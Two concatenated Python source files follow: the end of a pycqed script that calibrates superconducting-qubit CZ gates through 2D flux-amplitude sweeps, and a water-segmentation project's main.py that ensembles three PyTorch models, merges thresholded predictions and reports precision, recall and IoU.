from pycqed.measurement import cz_cost_functions as cf
conv_cost_det = det.Function_Detector(
get_function=cf.conventional_CZ_cost_func2,
msmt_kw={'device': device,
'MC': MC,
'pairs' : pairs,
'parked_qbs': parked_qubits,
'prepare_for_timedomain': False,
'disable_metadata': True,
'extract_only': True,
'flux_codeword': 'flux-dance-3',
'parked_qubit_seq': 'ground',
'include_single_qubit_phase_in_cost': False,
'target_single_qubit_phase': 360,
'include_leakage_in_cost': True,
'target_phase': 180,
'cond_phase_weight_factor': 2},
value_names=[f'cost_function_val_{pair}' for pair in pairs ] +
[f'delta_phi_{pair}' for pair in pairs ] +
[f'missing_fraction_{pair}' for pair in pairs ],
result_keys=[f'cost_function_val_{pair}' for pair in pairs ] +
[f'delta_phi_{pair}' for pair in pairs ] +
[f'missing_fraction_{pair}' for pair in pairs ],
value_units=['a.u.' for pair in pairs ] +
['deg' for pair in pairs ] +
['%' for pair in pairs ])
Sw_functions = [swf.FLsweep(flux_lm_target, flux_lm_target.parameters['vcz_amp_sq_{}'.format(gate[0])],
'cz_{}'.format(gate[0])) for flux_lm_target, gate in \
zip(flux_lms_target,which_gate)]
swf1 = swf.multi_sweep_function(Sw_functions, sweep_point_ratios= [1.2/3, 1, 1.2/3])
Sw_functions_2 = [swf.FLsweep(flux_lm_target, flux_lm_target.parameters['vcz_amp_fine_{}'.format(gate[0])],
'cz_{}'.format(gate[0])) for flux_lm_target, gate in \
zip(flux_lms_target,which_gate)]
swf2 = swf.multi_sweep_function(Sw_functions_2, sweep_point_ratios= [1, 1, 1])
MC.live_plot_enabled(True)
nested_MC.live_plot_enabled(True)
nested_MC.cfg_clipping_mode(True)
nested_MC.set_sweep_function(swf1)
nested_MC.set_sweep_function_2D(swf2)
nested_MC.set_sweep_points(np.linspace(.95, 1.05, 41))
nested_MC.set_sweep_points_2D(np.linspace(0, 1, 21))
label = 'VCZ_2D_{}_fine_sweep'.format(pairs)
nested_MC.set_detector_function(conv_cost_det)
result = nested_MC.run(label, mode='2D')
try:
ma2.Conditional_Oscillation_Heatmap_Analysis(label=label)
except Exception:
print('Failed Analysis')
###########################################
# VCZ calibration (fine landscape) FLUX dance 4
###########################################
# Align flux pulses
swf2 = swf.flux_t_middle_sweep(fl_lm_tm = [flux_lm_X4, flux_lm_D8,
flux_lm_D4, flux_lm_X3],
which_gate= ['SW', 'NE',
'NE', 'SW'],
fl_lm_park = [flux_lm_D9, flux_lm_Z1, flux_lm_Z3],
speed_limit = [2.75e-08,
2.9583333333333334e-08]) # input
swf2.set_parameter(7) # input
swf2 = swf.flux_t_middle_sweep(fl_lm_tm = [flux_lm_X2, flux_lm_D2],
which_gate= ['SW', 'NE'],
fl_lm_park = [flux_lm_D3],
speed_limit = [2.75e-08]) # input
swf2.set_parameter(3) # input
file_cfg = gc.generate_config(in_filename=input_file,
out_filename=config_fn,
mw_pulse_duration=20,
ro_duration=2200,
flux_pulse_duration=60,
init_duration=200000)
# flux-dance 4
## input from user besides cfg amps & speed limit & flux-dance codeword
pairs = [['X4', 'D8'], ['D4', 'X3'], ['X2', 'D2']]
which_gate= [['SW', 'NE'],['NE', 'SW'], ['SW', 'NE']]
parked_qubits = ['D9', 'Z1', 'Z3', 'D3']
cfg_amps = [] # input
## processed
flux_lms_target = [device.find_instrument("flux_lm_{}".format(pair[0]))\
for pair in pairs]
flux_lms_control = [device.find_instrument("flux_lm_{}".format(pair[1]))\
for pair in pairs]
flux_lms_park = [device.find_instrument("flux_lm_{}".format(qb))\
for qb in parked_qubits]
# set CZ parameters
for i,flux_lm_target in enumerate(flux_lms_target):
flux_lm_target.cfg_awg_channel_amplitude(cfg_amps[i])
flux_lm_target.set("vcz_amp_dac_at_11_02_{}".format(which_gate[i][0]), 0.5)
flux_lms_control[i].set("vcz_amp_dac_at_11_02_{}".format(which_gate[i][1]), 0)
# Set park parameters
for i,flux_lm_park in enumerate(flux_lms_park):
flux_lm_park.cfg_awg_channel_amplitude(.3)
flux_lm_park.park_amp(.5)
flux_lm_park.park_double_sided(True)
list_qubits_used = np.asarray(pairs).flatten().tolist()
which_gates = np.asarray(which_gate).flatten().tolist()
device.ro_acq_averages(1024)
device.ro_acq_digitized(False)
device.ro_acq_weight_type('optimal')
device.prepare_fluxing(qubits=parked_qubits)
device.prepare_for_timedomain(qubits=list_qubits_used)
from pycqed.measurement import cz_cost_functions as cf
conv_cost_det = det.Function_Detector(
get_function=cf.conventional_CZ_cost_func2,
msmt_kw={'device': device,
'MC': MC,
'pairs' : pairs,
'parked_qbs': parked_qubits,
'prepare_for_timedomain': False,
'disable_metadata': True,
'extract_only': True,
'flux_codeword': 'flux-dance-4',
'parked_qubit_seq': 'ground',
'include_single_qubit_phase_in_cost': False,
'target_single_qubit_phase': 360,
'include_leakage_in_cost': True,
'target_phase': 180,
'cond_phase_weight_factor': 2},
value_names=[f'cost_function_val_{pair}' for pair in pairs ] +
[f'delta_phi_{pair}' for pair in pairs ] +
[f'missing_fraction_{pair}' for pair in pairs ],
result_keys=[f'cost_function_val_{pair}' for pair in pairs ] +
[f'delta_phi_{pair}' for pair in pairs ] +
[f'missing_fraction_{pair}' for pair in pairs ],
value_units=['a.u.' for pair in pairs ] +
['deg' for pair in pairs ] +
['%' for pair in pairs ])
Sw_functions = [swf.FLsweep(flux_lm_target, flux_lm_target.parameters['vcz_amp_sq_{}'.format(gate[0])],
'cz_{}'.format(gate[0])) for flux_lm_target, gate in \
zip(flux_lms_target,which_gate)]
swf1 = swf.multi_sweep_function(Sw_functions, sweep_point_ratios= [1.2/3, 1, 1.2/3])
Sw_functions_2 = [swf.FLsweep(flux_lm_target, flux_lm_target.parameters['vcz_amp_fine_{}'.format(gate[0])],
'cz_{}'.format(gate[0])) for flux_lm_target, gate in \
zip(flux_lms_target,which_gate)]
swf2 = swf.multi_sweep_function(Sw_functions_2, sweep_point_ratios= [1, 1, 1])
MC.live_plot_enabled(True)
nested_MC.live_plot_enabled(True)
nested_MC.cfg_clipping_mode(True)
nested_MC.set_sweep_function(swf1)
nested_MC.set_sweep_function_2D(swf2)
nested_MC.set_sweep_points(np.linspace(.95, 1.05, 41))
nested_MC.set_sweep_points_2D(np.linspace(0, 1, 21))
label = 'VCZ_2D_{}_fine_sweep'.format(pairs)
nested_MC.set_detector_function(conv_cost_det)
result = nested_MC.run(label, mode='2D')
try:
ma2.Conditional_Oscillation_Heatmap_Analysis(label=label)
except Exception:
print('Failed Analysis')
# ==== main.py (IewNixIl/graduation_project_under, MIT) ====
from Config import config
from train import train
from test import testTools,getimg,getlabel_low
import numpy
from DATA import WaterDataset
import Networks
from torchvision import transforms as T
from torch.utils.data import DataLoader
from matplotlib import pyplot
import os
from PIL import Image
import time
import util
from utils import correct_merge
from multiprocessing import Process
import torch
def predict_seg_merge_mask(models,n_ite,thres,ifrun=[True,True,True]):
path_models='D:\\codes\\Graduation\\MODELS'
subs=['train_sub1','train_sub2','train_sub3']  # subs correspond one-to-one with models
path='D:\\result\\train_result'
transform_img=config.transform_img
transform_label=config.transform_label
model1=getattr(Networks,config.model)(config.input_band,1)  # build the network object
path_model=path_models+'\\'+models[0]
# load the trained weights
model1.load(path_model)
if config.use_gpu:  # move to GPU
model1=model1.cuda()
model2=getattr(Networks,config.model)(config.input_band,1)  # build the network object
path_model=path_models+'\\'+models[1]
# load the trained weights
model2.load(path_model)
if config.use_gpu:  # move to GPU
model2=model2.cuda()
model3=getattr(Networks,config.model)(config.input_band,1)  # build the network object
path_model=path_models+'\\'+models[2]
# load the trained weights
model3.load(path_model)
if config.use_gpu:  # move to GPU
model3=model3.cuda()
test_data=WaterDataset(sub=subs[0],train=True,val=False,transforms_img=transform_img,transforms_label=transform_label)
test_dataloader1=DataLoader(test_data,1,
shuffle=True,  # reshuffle every epoch
num_workers=config.num_workers)
test_data=WaterDataset(sub=subs[1],train=True,val=False,transforms_img=transform_img,transforms_label=transform_label)
test_dataloader2=DataLoader(test_data,1,
shuffle=True,  # reshuffle every epoch
num_workers=config.num_workers)
test_data=WaterDataset(sub=subs[2],train=True,val=False,transforms_img=transform_img,transforms_label=transform_label)
test_dataloader3=DataLoader(test_data,1,
shuffle=True,  # reshuffle every epoch
num_workers=config.num_workers)
if ifrun[0]:
name_merge='predict_'+str(n_ite)+'_sub1_merge'
name_mask='predict_'+str(n_ite)+'_sub1_mask'
path_merge=path+'\\'+str(n_ite)+'ite'+'\\'+name_merge
path_mask=path+'\\'+str(n_ite)+'ite'+'\\'+name_mask
if not os.path.exists(path_merge):
os.makedirs(path_merge)
if not os.path.exists(path_mask):
os.makedirs(path_mask)
for i,data in enumerate(test_dataloader1,0):
inputs,labels,name=data  # unpack inputs, labels and tile name
if config.use_gpu:
inputs=inputs.cuda()
merge=(torch.where(model1(inputs)>torch.tensor(thres[0]).cuda(),torch.tensor([1]).cuda(),torch.tensor([0]).cuda())+
torch.where(model2(inputs)>torch.tensor(thres[1]).cuda(),torch.tensor([1]).cuda(),torch.tensor([0]).cuda())+
torch.where(model3(inputs)>torch.tensor(thres[2]).cuda(),torch.tensor([1]).cuda(),torch.tensor([0]).cuda()))/torch.tensor([3]).cuda()
merge=numpy.array(merge[0,0,:,:].cpu().detach())
mask=numpy.where(numpy.where(merge==1,True,False)+numpy.where(merge==0,True,False),1,0)
Image.fromarray((merge*255).astype(numpy.uint8)).save(path+'\\'+str(n_ite)+'ite'+'\\'+name_merge+'\\'+name[0])
Image.fromarray(mask).save(path+'\\'+str(n_ite)+'ite'+'\\'+name_mask+'\\'+name[0])
if i%1000==0:
print(i)
if ifrun[1]:
name_merge='predict_'+str(n_ite)+'_sub2_merge'
name_mask='predict_'+str(n_ite)+'_sub2_mask'
path_merge=path+'\\'+str(n_ite)+'ite'+'\\'+name_merge
path_mask=path+'\\'+str(n_ite)+'ite'+'\\'+name_mask
if not os.path.exists(path_merge):
os.makedirs(path_merge)
if not os.path.exists(path_mask):
os.makedirs(path_mask)
for i,data in enumerate(test_dataloader2,0):
inputs,labels,name=data  # unpack inputs, labels and tile name
if config.use_gpu:
inputs=inputs.cuda()
merge=(torch.where(model1(inputs)>torch.tensor(thres[0]).cuda(),torch.tensor([1]).cuda(),torch.tensor([0]).cuda())+
torch.where(model2(inputs)>torch.tensor(thres[1]).cuda(),torch.tensor([1]).cuda(),torch.tensor([0]).cuda())+
torch.where(model3(inputs)>torch.tensor(thres[2]).cuda(),torch.tensor([1]).cuda(),torch.tensor([0]).cuda()))/torch.tensor([3]).cuda()
merge=numpy.array(merge[0,0,:,:].cpu().detach())
mask=numpy.where(numpy.where(merge==1,True,False)+numpy.where(merge==0,True,False),1,0)
Image.fromarray((merge*255).astype(numpy.uint8)).save(path+'\\'+str(n_ite)+'ite'+'\\'+name_merge+'\\'+name[0])
Image.fromarray(mask).save(path+'\\'+str(n_ite)+'ite'+'\\'+name_mask+'\\'+name[0])
if i%1000==0:
print(i)
if ifrun[2]:
name_merge='predict_'+str(n_ite)+'_sub3_merge'
name_mask='predict_'+str(n_ite)+'_sub3_mask'
path_merge=path+'\\'+str(n_ite)+'ite'+'\\'+name_merge
path_mask=path+'\\'+str(n_ite)+'ite'+'\\'+name_mask
if not os.path.exists(path_merge):
os.makedirs(path_merge)
if not os.path.exists(path_mask):
os.makedirs(path_mask)
for i,data in enumerate(test_dataloader3,0):
inputs,labels,name=data  # unpack inputs, labels and tile name
if config.use_gpu:
inputs=inputs.cuda()
merge=(torch.where(model1(inputs)>torch.tensor(thres[0]).cuda(),torch.tensor([1]).cuda(),torch.tensor([0]).cuda())+
torch.where(model2(inputs)>torch.tensor(thres[1]).cuda(),torch.tensor([1]).cuda(),torch.tensor([0]).cuda())+
torch.where(model3(inputs)>torch.tensor(thres[2]).cuda(),torch.tensor([1]).cuda(),torch.tensor([0]).cuda()))/torch.tensor([3]).cuda()
merge=numpy.array(merge[0,0,:,:].cpu().detach())
mask=numpy.where(numpy.where(merge==1,True,False)+numpy.where(merge==0,True,False),1,0)
Image.fromarray((merge*255).astype(numpy.uint8)).save(path+'\\'+str(n_ite)+'ite'+'\\'+name_merge+'\\'+name[0])
Image.fromarray(mask).save(path+'\\'+str(n_ite)+'ite'+'\\'+name_mask+'\\'+name[0])
if i%1000==0:
print(i)
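The torch expression used in each loop above implements a per-pixel majority vote: every model's thresholded map contributes 0 or 1, the average of the votes is stored as `merge`, and `mask` flags pixels where all models agree. The same logic in plain numpy, as a small testable sketch:

```python
import numpy as np

def merge_and_mask(preds, thresholds):
    """Vote-merge float prediction maps in [0, 1] and mark unanimous pixels."""
    votes = [np.where(p > t, 1, 0) for p, t in zip(preds, thresholds)]
    merge = np.mean(votes, axis=0)           # fraction of models voting "water"
    unanimous = (merge == 1) | (merge == 0)  # all models agree on the label
    mask = np.where(unanimous, 1, 0)
    return merge, mask
```

The mask is what lets the next training iteration use only the confidently-labeled pixels.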
def predict_all(models,n_ite,ifrun):
'''Three data subsets and three trained models are given;
generate nine predictions (each model crossed with each subset).
'''
path_models='D:\\codes\\Graduation\\MODELS'
#models=['model35','model36','model37']
subs=['train_sub1','train_sub2','train_sub3']  # subs correspond one-to-one with models
#n_ite=1  # n_ite counts from 1
path_pre='D:\\result\\train_result'
transform_img=config.transform_img
transform_label=config.transform_label
# model setup
model=getattr(Networks,config.model)(config.input_band,1)  # build the network object
if ifrun[0]:
'''model1 predicts sub1, sub2, sub3'''
path_model=path_models+'\\'+models[0]
# load the trained weights
model.load(path_model)
if config.use_gpu:
model=model.cuda()
#sub1
path_predict=path_pre+'\\'+str(n_ite)+'ite'+'\\'+'predict_'+str(n_ite)+'_sub1_model1'
if not os.path.exists(path_predict):
os.makedirs(path_predict)
test_data=WaterDataset(sub=subs[0],train=True,val=False,transforms_img=transform_img,transforms_label=transform_label)
test_dataloader=DataLoader(test_data,1,
shuffle=True,  # reshuffle every epoch
num_workers=config.num_workers)
t=testTools(model=model,data=test_dataloader)
t.predict(path_predict=path_predict)
#sub2
path_predict=path_pre+'\\'+str(n_ite)+'ite'+'\\'+'predict_'+str(n_ite)+'_sub2_model1'
if not os.path.exists(path_predict):
os.makedirs(path_predict)
test_data=WaterDataset(sub=subs[1],train=True,val=False,transforms_img=transform_img,transforms_label=transform_label)
test_dataloader=DataLoader(test_data,1,
shuffle=True,  # reshuffle every epoch
num_workers=config.num_workers)
t=testTools(model=model,data=test_dataloader)
t.predict(path_predict=path_predict)
#sub3
path_predict=path_pre+'\\'+str(n_ite)+'ite'+'\\'+'predict_'+str(n_ite)+'_sub3_model1'
if not os.path.exists(path_predict):
os.makedirs(path_predict)
test_data=WaterDataset(sub=subs[2],train=True,val=False,transforms_img=transform_img,transforms_label=transform_label)
test_dataloader=DataLoader(test_data,1,
shuffle=True,  # reshuffle every epoch
num_workers=config.num_workers)
t=testTools(model=model,data=test_dataloader)
t.predict(path_predict=path_predict)
'''model2 predicts sub1, sub2, sub3'''
if ifrun[1]:
path_model=path_models+'\\'+models[1]
# load the trained weights
model.load(path_model)
if config.use_gpu:
model=model.cuda()
#sub1
path_predict=path_pre+'\\'+str(n_ite)+'ite'+'\\'+'predict_'+str(n_ite)+'_sub1_model2'
if not os.path.exists(path_predict):
os.makedirs(path_predict)
test_data=WaterDataset(sub=subs[0],train=True,val=False,transforms_img=transform_img,transforms_label=transform_label)
test_dataloader=DataLoader(test_data,1,
shuffle=True,  # reshuffle every epoch
num_workers=config.num_workers)
t=testTools(model=model,data=test_dataloader)
t.predict(path_predict=path_predict)
#sub2
path_predict=path_pre+'\\'+str(n_ite)+'ite'+'\\'+'predict_'+str(n_ite)+'_sub2_model2'
if not os.path.exists(path_predict):
os.makedirs(path_predict)
test_data=WaterDataset(sub=subs[1],train=True,val=False,transforms_img=transform_img,transforms_label=transform_label)
test_dataloader=DataLoader(test_data,1,
shuffle=True,  # reshuffle every epoch
num_workers=config.num_workers)
t=testTools(model=model,data=test_dataloader)
t.predict(path_predict=path_predict)
#sub3
path_predict=path_pre+'\\'+str(n_ite)+'ite'+'\\'+'predict_'+str(n_ite)+'_sub3_model2'
if not os.path.exists(path_predict):
os.makedirs(path_predict)
test_data=WaterDataset(sub=subs[2],train=True,val=False,transforms_img=transform_img,transforms_label=transform_label)
test_dataloader=DataLoader(test_data,1,
shuffle=True,  # reshuffle every epoch
num_workers=config.num_workers)
t=testTools(model=model,data=test_dataloader)
t.predict(path_predict=path_predict)
'''model3 predicts sub1, sub2, sub3'''
if ifrun[2]:
path_model=path_models+'\\'+models[2]
# load the trained weights
model.load(path_model)
if config.use_gpu:
model=model.cuda()
#sub1
path_predict=path_pre+'\\'+str(n_ite)+'ite'+'\\'+'predict_'+str(n_ite)+'_sub1_model3'
if not os.path.exists(path_predict):
os.makedirs(path_predict)
test_data=WaterDataset(sub=subs[0],train=True,val=False,transforms_img=transform_img,transforms_label=transform_label)
test_dataloader=DataLoader(test_data,1,
shuffle=True,  # reshuffle every epoch
num_workers=config.num_workers)
t=testTools(model=model,data=test_dataloader)
t.predict(path_predict=path_predict)
#sub2
path_predict=path_pre+'\\'+str(n_ite)+'ite'+'\\'+'predict_'+str(n_ite)+'_sub2_model3'
if not os.path.exists(path_predict):
os.makedirs(path_predict)
test_data=WaterDataset(sub=subs[1],train=True,val=False,transforms_img=transform_img,transforms_label=transform_label)
test_dataloader=DataLoader(test_data,1,
shuffle=True,  # reshuffle every epoch
num_workers=config.num_workers)
t=testTools(model=model,data=test_dataloader)
t.predict(path_predict=path_predict)
#sub3
path_predict=path_pre+'\\'+str(n_ite)+'ite'+'\\'+'predict_'+str(n_ite)+'_sub3_model3'
if not os.path.exists(path_predict):
os.makedirs(path_predict)
test_data=WaterDataset(sub=subs[2],train=True,val=False,transforms_img=transform_img,transforms_label=transform_label)
test_dataloader=DataLoader(test_data,1,
shuffle=True,#每一epoch打乱数据
num_workers=config.num_workers)
t=testTools(model=model,data=test_dataloader)
t.predict(path_predict=path_predict)
def segment_merge(n_ite,thre,ifrun):
    '''Segment + merge.
    Segment: binarize each model's prediction with its own threshold.
    Merge: assign each pixel (sum of labels)/(number of models). For example,
    with three models, if one model calls a pixel water (1) and the other two
    call it non-water (0), the pixel gets (0+0+1)/3.
    '''
    #n_ite=1
    path='D:\\result\\train_result\\'+str(n_ite)+'ite'
    #thre=[0.31,0.24,0.34]  # thresholds for model1, model2, model3
    # The three sub-area branches were identical except for the sub index,
    # so they are folded into one loop.
    for i_sub in range(3):
        if not ifrun[i_sub]:
            continue
        sub='sub'+str(i_sub+1)
        name=['predict_'+str(n_ite)+'_'+sub+'_model'+str(m) for m in (1,2,3)]
        name_to='predict_'+str(n_ite)+'_'+sub+'_merge'
        if not os.path.exists(path+'\\'+name_to):
            os.makedirs(path+'\\'+name_to)
        d=os.listdir(path+'\\'+name[0])
        for i in range(len(d)):
            if i%100==0:
                print(i)
            predicts=[numpy.array(Image.open(path+'\\'+n+'\\'+d[i])) for n in name]
            imgs=[numpy.where(p>t,1,0) for p,t in zip(predicts,thre)]
            img=sum(imgs)/3
            Image.fromarray((img*255).astype(numpy.uint8)).save(path+'\\'+name_to+'\\'+d[i])
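The per-pixel merge rule used above (threshold each model's probability map, then average the binary votes) can be sketched on its own with plain lists; the probability values and thresholds below are made-up illustration numbers, not from the project:

```python
# Hypothetical probability maps from three models, flattened to 1-D lists.
p1 = [0.9, 0.1, 0.5, 0.2]
p2 = [0.8, 0.3, 0.1, 0.2]
p3 = [0.7, 0.1, 0.6, 0.9]
thre = [0.31, 0.24, 0.34]  # one threshold per model

# Binarize each model's output with its threshold ("segment").
votes = [[1 if v > t else 0 for v in p] for p, t in zip((p1, p2, p3), thre)]

# Per-pixel fraction of models that voted "water" ("merge").
merged = [sum(col) / 3 for col in zip(*votes)]
print(merged)  # first pixel: all three agree -> 1.0
```

The merged value is exactly the (0+0+1)/3-style vote fraction described in the docstring; scaling it by 255 reproduces the grayscale images the function writes out.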
def random_labels():
    '''Integration wrapper for random_label in utils.
    '''
    n_ite=1
    path='G:\\Graguation\\train_result\\'+str(n_ite)+'ite'
    name_from=['predict_'+str(n_ite)+'_sub1_merge','predict_'+str(n_ite)+'_sub2_merge','predict_'+str(n_ite)+'_sub3_merge']
    name_to=['predict_'+str(n_ite)+'_sub1_random','predict_'+str(n_ite)+'_sub2_random','predict_'+str(n_ite)+'_sub3_random']
    '''sub1'''
    util.random_label(path+'\\'+name_from[0],path+'\\'+name_to[0])
    '''sub2'''
    util.random_label(path+'\\'+name_from[1],path+'\\'+name_to[1])
    '''sub3'''
    util.random_label(path+'\\'+name_from[2],path+'\\'+name_to[2])
def masks(n_ite,ifrun):
    '''Integration wrapper for mask in utils.
    '''
    #n_ite=1
    path='D:\\result\\train_result\\'+str(n_ite)+'ite'
    name_from=['predict_'+str(n_ite)+'_sub1_merge','predict_'+str(n_ite)+'_sub2_merge','predict_'+str(n_ite)+'_sub3_merge']
    name_to=['predict_'+str(n_ite)+'_sub1_mask_correct','predict_'+str(n_ite)+'_sub2_mask_correct','predict_'+str(n_ite)+'_sub3_mask_correct']
    # sub1/sub2/sub3 branches folded into one loop; behavior is unchanged.
    for i in range(3):
        if ifrun[i]:
            if not os.path.exists(path+'\\'+name_to[i]):
                os.makedirs(path+'\\'+name_to[i])
            util.mask(path+'\\'+name_from[i],path+'\\'+name_to[i])
def masks_another(n_ite,ifrun):
    '''Integration wrapper for mask_another in utils.
    '''
    #n_ite=1
    path='D:\\result\\train_result\\'+str(n_ite)+'ite'
    name_from=['predict_'+str(n_ite)+'_sub1_merge','predict_'+str(n_ite)+'_sub2_merge','predict_'+str(n_ite)+'_sub3_merge']
    name_to=['predict_'+str(n_ite)+'_sub1_mask_another','predict_'+str(n_ite)+'_sub2_mask_another','predict_'+str(n_ite)+'_sub3_mask_another']
    # sub1/sub2/sub3 branches folded into one loop; behavior is unchanged.
    for i in range(3):
        if ifrun[i]:
            if not os.path.exists(path+'\\'+name_to[i]):
                os.makedirs(path+'\\'+name_to[i])
            util.mask_another(path+'\\'+name_from[i],path+'\\'+name_to[i])
def merge_mask():
    '''Integration wrapper for masked_label in utils.
    '''
    n_ite=1
    path='G:\\Graguation\\train_result\\'+str(n_ite)+'ite'
    name_from=['predict_'+str(n_ite)+'_sub1_merge','predict_'+str(n_ite)+'_sub2_merge','predict_'+str(n_ite)+'_sub3_merge']
    name_mask=['predict_'+str(n_ite)+'_sub1_mask','predict_'+str(n_ite)+'_sub2_mask','predict_'+str(n_ite)+'_sub3_mask']
    name_to=['predict_'+str(n_ite)+'_sub1_merge_mask','predict_'+str(n_ite)+'_sub2_merge_mask','predict_'+str(n_ite)+'_sub3_merge_mask']
    '''sub1'''
    util.masked_label(path+'\\'+name_from[0],path+'\\'+name_mask[0],path+'\\'+name_to[0])
    '''sub2'''
    util.masked_label(path+'\\'+name_from[1],path+'\\'+name_mask[1],path+'\\'+name_to[1])
    '''sub3'''
    util.masked_label(path+'\\'+name_from[2],path+'\\'+name_mask[2],path+'\\'+name_to[2])
def correct_all(n_ite,ifrun):
    '''Integration wrapper for correct_merge in utils.
    '''
    #n_ite=1
    path='D:\\result\\train_result\\'+str(n_ite)+'ite'
    name_from=['predict_'+str(n_ite)+'_sub1_merge','predict_'+str(n_ite)+'_sub2_merge','predict_'+str(n_ite)+'_sub3_merge']
    name_to=['predict_'+str(n_ite)+'_sub1_correct','predict_'+str(n_ite)+'_sub2_correct','predict_'+str(n_ite)+'_sub3_correct']
    # sub1/sub2/sub3 branches folded into one loop; behavior is unchanged.
    for i in range(3):
        if ifrun[i]:
            if not os.path.exists(path+'\\'+name_to[i]):
                os.makedirs(path+'\\'+name_to[i])
            correct_merge(path+'\\'+name_from[i],path+'\\'+name_to[i])
def train_test(path_model,path_sta,path_label,path_mask,sub_name,ifboard=config.ifboard):
    train(path_model,path_sta,path_label=path_label,path_mask=path_mask,sub_name=sub_name,ifboard=ifboard)
    '''model setup'''
    model=getattr(Networks,config.model)(config.input_band,1)  # create the network object
    # load the model
    model.load(path_model)
    if config.use_gpu:  # use the GPU
        model=model.cuda()
    '''data loading'''
    transform_img=config.transform_img
    transform_label=config.transform_label
    test_data=WaterDataset(train=False,val=False,transforms_img=transform_img,transforms_label=transform_label)
    test_dataloader=DataLoader(test_data,1,
                               shuffle=True,  # shuffle the data each epoch
                               num_workers=2)
    t=testTools(model=model,data=test_dataloader,path_model=path_model)
    #t.predict()
    #t.pr(save=save,show=show)
    #t.predict(0.24)
    #t.getlabel_low_trained(0.48)
    #getlabel_low()
    p,r,f=t.pr_fmeasure()
    pa=t.PA()
    iou=t.IoU()
    miou=t.MIoU()
    aa=t.AA()
    #t.drawStatistic()
    #p,r,f,pa,iou=t.integrate('F:\\Graduation\\MODELS',['model20','model21','model22','model23'])
    l=iou
    thre=int(l.argmax())
    print('At threshold '+str(thre/100)+':')
    print('precision: '+str(p[thre]))
    print('recall: '+str(r[thre]))
    print('f measure: '+str(f[thre]))
    print('pa: '+str(pa[thre]))
    print('iou: '+str(iou[thre]))
    print('miou: '+str(miou[thre]))
    print('aa: '+str(aa[thre]))
    t.recordPrecision(thre/100,p[thre],r[thre],f[thre],pa[thre],iou[thre])
    '''
    pyplot.plot(f,label='f-measure')
    pyplot.plot(pa,label='pa')
    pyplot.plot(iou,label='iou')
    pyplot.legend()
    pyplot.show()
    '''
    #t.drawStatistic()
    return thre/100
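train_test picks its operating threshold by taking the argmax of the IoU curve, where index i corresponds to threshold i/100. A minimal standalone sketch of that selection step, using a made-up five-entry IoU curve instead of the real 100-entry one:

```python
# Hypothetical IoU values for thresholds 0.00, 0.01, 0.02, 0.03, 0.04.
iou_curve = [0.52, 0.61, 0.68, 0.64, 0.57]

# Plain-Python equivalent of numpy's int(iou.argmax()).
best_idx = max(range(len(iou_curve)), key=iou_curve.__getitem__)
best_threshold = best_idx / 100

print(best_idx, best_threshold)  # 2 0.02
```

Dividing the winning index by 100 is what turns the curve position back into the probability threshold that the rest of the pipeline consumes.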
def test3(models):
    '''model setup'''
    model1=getattr(Networks,config.model)(config.input_band,1)  # create the network object
    model2=getattr(Networks,config.model)(config.input_band,1)  # create the network object
    model3=getattr(Networks,config.model)(config.input_band,1)  # create the network object
    # load the models
    model1.load('D:\\codes\\Graduation\\MODELS\\'+models[0])
    model2.load('D:\\codes\\Graduation\\MODELS\\'+models[1])
    model3.load('D:\\codes\\Graduation\\MODELS\\'+models[2])
    if config.use_gpu:  # use the GPU
        model1=model1.cuda()
        model2=model2.cuda()
        model3=model3.cuda()
    '''data loading'''
    transform_img=config.transform_img
    transform_label=config.transform_label
    test_data=WaterDataset(train=False,val=False,transforms_img=transform_img,transforms_label=transform_label)
    test_dataloader=DataLoader(test_data,1,
                               shuffle=True,  # shuffle the data each epoch
                               num_workers=2)
    #getsar('G:\\Graguation\\test_result\\sar1','G:\\Graguation\\test_result\\sar2')
    #getlabel_low('G:\\Graguation\\test_result\\lowlabel')
    t=testTools(model=[model1,model2,model3],data=test_dataloader)
    #t.predict()
    #t.pr(save=save,show=show)
    #t.predict(0.24)
    #t.getlabel_low_trained(0.48)
    #getlabel_low()
    #t.drawStatistic()
    p,r,f=t.pr_fmeasure()
    pa=t.PA()
    iou=t.IoU()
    miou=t.MIoU()
    aa=t.AA()
    #t.drawStatistic()
    #p,r,f,pa,iou=t.integrate('F:\\Graduation\\MODELS',['model20','model21','model22','model23'])
    l=iou
    thre=int(l.argmax())
    print('At threshold '+str(thre/100)+':')
    print('precision: '+str(p[thre]))
    print('recall: '+str(r[thre]))
    print('f measure: '+str(f[thre]))
    print('oa: '+str(pa[thre]))
    print('iou: '+str(iou[thre]))
    print('miou: '+str(miou[thre]))
    print('aa: '+str(aa[thre]))
    #t.recordPrecision(thre/100,p[thre],r[thre],f[thre],pa[thre],iou[thre])
    pyplot.plot(f,label='f-measure')
    pyplot.plot(pa,label='pa')
    pyplot.plot(iou,label='iou')
    pyplot.legend()
    pyplot.show()
if __name__=='__main__':
    #getlabel_low('D:\\result\\final_result\\labels_low')
    test3(['model67','model68','model69'])
    #util.segment('D:\\result\\final_result\\predicts','D:\\result\\final_result\\segments',0.38)
    #getimg()
    #ifrun=[True,False,False]
    #ifrun=[False,True,False]
    #ifrun=[False,False,True]
    #ifrun=[True,True,True]
    #n_ite=2
    #predict_all(['model19','model20','model21'],n_ite,ifrun)
    #predict_all(['model4','model5','model6'],2,[False,True,False])
    #predict_all(['model4','model5','model6'],2,[False,False,True])
    #segment_merge(4,[0.38,0.37,0.24],[True,True,True])
    #masks_another(4,[True,True,True])
    #correct_all(1,ifrun)
    #predict_seg_merge_mask(['model43','model44','model45'],n_ite,[0.03,0.04,0.2])
    #segment_merge()
    #random_labels()
    #masks()
    #train_test()
    '''
    from multiprocessing import Process
    t1=time.time()
    p1 = Process(target=predict_all, args=(['model40','model41','model42'],n_ite,[False,False,True],))
    p2 = Process(target=predict_all, args=(['model40','model41','model42'],n_ite,[False,True,False],))
    p3 = Process(target=predict_all, args=(['model40','model41','model42'],n_ite,[True,False,False],))
    p1.start()
    p2.start()
    p3.start()
    p1.join()
    p2.join()
    p3.join()
    t2=time.time()
    print((t2-t1)/60)
    t1=time.time()
    p1 = Process(target=segment_merge, args=(n_ite,[0.15,0.07,0.06],[False,False,True],))
    p2 = Process(target=segment_merge, args=(n_ite,[0.15,0.07,0.06],[False,True,False],))
    p3 = Process(target=segment_merge, args=(n_ite,[0.15,0.07,0.06],[True,False,False],))
    p1.start()
    p2.start()
    p3.start()
    p1.join()
    p2.join()
    p3.join()
    t2=time.time()
    print((t2-t1)/60)
    t1=time.time()
    p1 = Process(target=correct_all, args=(n_ite,[False,False,True],))
    p2 = Process(target=correct_all, args=(n_ite,[False,True,False],))
    p3 = Process(target=correct_all, args=(n_ite,[True,False,False],))
    p1.start()
    p2.start()
    p3.start()
    p1.join()
